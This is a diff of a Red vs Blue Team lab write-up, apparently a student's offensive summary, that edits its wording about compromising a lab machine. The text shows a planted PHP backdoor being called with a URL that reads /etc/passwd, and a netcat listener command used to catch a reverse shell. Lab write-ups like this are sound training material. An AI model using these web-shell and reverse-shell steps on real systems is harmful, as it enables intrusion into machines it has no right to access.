patricknakayama/Red_vs_Blue_Team/OffensiveSummary.md

 ![Script Execution](Images/target2_script_execution.png)

-  - Navigating to 192.168.1.115/backdoor.php?cmd=<CMD> now allows bash commands to be executed on Target 2.
+  - Navigating to `192.168.1.115/backdoor.php?cmd=<CMD>` now allows bash commands to be executed on Target 2.
     - **URL**: `192.168.1.115/backdoor.php?cmd=cat%20/etc/passwd`

 ![Backdoor 1](Images/target2_backdoor1.png)

-  - Used backdoor to open a shell session on the target.
+  - Used backdoor to open a reverse shell session on the target with Ncat listener and command injection in browser.
-  - Started netcat listener on attacking Kali VM.
+  - Started Ncat listener on attacking Kali VM.
     - **Command**: `nc -lnvp 4444`

 ```bash